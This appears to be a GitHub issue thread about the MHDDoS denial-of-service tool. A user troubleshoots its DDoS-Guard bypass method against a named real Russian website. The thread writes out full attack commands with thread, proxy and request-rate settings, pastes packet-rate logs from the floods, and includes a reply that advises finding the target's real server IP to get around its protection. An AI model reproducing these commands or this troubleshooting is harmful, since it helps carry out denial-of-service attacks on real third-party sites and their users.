MHDDoS
MHDDoS copied to clipboard
Zero value with DGB attack method
using https://github.com/porthole-ascend-cinnamon/mhddos_proxy just to run many targets in one line
runs this with the old commit ( https://github.com/MHProDev/MHDDoS/tree/c6922926e9e5b35f6ecab58e0ace0d8bc1aecb87 ): sudo python3 runner.py https://www.tadviser.ru https://www.tadviser.ru/index.php/Аналитика_TAdviser https://www.tadviser.ru/index.php/Судебные_дела -t 5000 -p 600 --rpc 500 --http-methods DGB --debug
and the output is normal: [17:10:17 - DEBUG] PPS: 770, BPS: 690.75 kB / 0% [17:10:17 - DEBUG] PPS: 1.43k, BPS: 1.04 MB / 0% [17:10:18 - DEBUG] PPS: 2.45k, BPS: 2.15 MB / 0% [17:10:18 - DEBUG] PPS: 1.48k, BPS: 1.34 MB / 0% [17:10:18 - DEBUG] PPS: 1.72k, BPS: 1.27 MB / 0% [17:10:19 - DEBUG] PPS: 1.71k, BPS: 1.50 MB / 0% [17:10:19 - DEBUG] PPS: 974, BPS: 864.64 kB / 0% [17:10:19 - DEBUG] PPS: 1.21k, BPS: 875.07 kB / 0% [17:10:20 - DEBUG] PPS: 1.81k, BPS: 1.59 MB / 0% [17:10:20 - DEBUG] PPS: 820, BPS: 735.47 kB / 0% [17:10:20 - DEBUG] PPS: 769, BPS: 563.03 kB / 0% [17:10:21 - DEBUG] PPS: 1.01k, BPS: 884.17 kB / 0% [17:10:21 - DEBUG] PPS: 605, BPS: 546.55 kB / 0% [17:10:21 - DEBUG] PPS: 779, BPS: 572.32 kB / 0%
runs this with the actual commit ( https://github.com/MHProDev/MHDDoS/tree/b22865fe5f3e78fe82f632d10b478b4ddf551a78 ): sudo python3 runner.py https://www.tadviser.ru https://www.tadviser.ru/index.php/Аналитика_TAdviser https://www.tadviser.ru/index.php/Судебные_дела -t 5000 -p 600 --rpc 500 --http-methods DGB --debug
and the output is zero: [19:06:49 - DEBUG] ←[93mTarget:←[94m www.tadviser.ru,←[93m Port:←[94m 443,←[93m Method:←[94m DGB←[93m PPS:←[94m 0,←[93m BPS:←[94m -- B / 2%←[0m [19:06:49 - DEBUG] ←[93mTarget:←[94m www.tadviser.ru,←[93m Port:←[94m 443,←[93m Method:←[94m DGB←[93m PPS:←[94m 0,←[93m BPS:←[94m -- B / 2%←[0m [19:06:49 - DEBUG] ←[93mTarget:←[94m www.tadviser.ru,←[93m Port:←[94m 443,←[93m Method:←[94m DGB←[93m PPS:←[94m 0,←[93m BPS:←[94m -- B / 2%←[0m [19:06:50 - DEBUG] ←[93mTarget:←[94m www.tadviser.ru,←[93m Port:←[94m 443,←[93m Method:←[94m DGB←[93m PPS:←[94m 0,←[93m BPS:←[94m -- B / 2%←[0m [19:06:50 - DEBUG] ←[93mTarget:←[94m www.tadviser.ru,←[93m Port:←[94m 443,←[93m Method:←[94m DGB←[93m PPS:←[94m 0,←[93m BPS:←[94m -- B / 2%←[0m [19:06:50 - DEBUG] ←[93mTarget:←[94m www.tadviser.ru,←[93m Port:←[94m 443,←[93m Method:←[94m DGB←[93m PPS:←[94m 0,←[93m BPS:←[94m -- B / 2%←[0m
I think the problem is cookie: https://github.com/MHProDev/MHDDoS/blob/b22865fe5f3e78fe82f632d10b478b4ddf551a78/start.py#L809
@alexnest-ua
The old version actually runs GET
method, despite saying DGB
is used. Check this method - it has not if
for the DGB (see the relevant issue #231).
Current DGB implementation does not work - and it's unlikely there exists a working implementation of DDoS-Guard bypass. Either you can find the real servers IP, or you have no luck DDoSing them. Again, just to repeat, the traffic in your first example just hits the DDoS-Guard servers and does nothing to the actual target, since it actually runs a plain GET
attack.
Then let the author remove this method / indicate that it is not working, or find an implementation to bypass the DDoS guard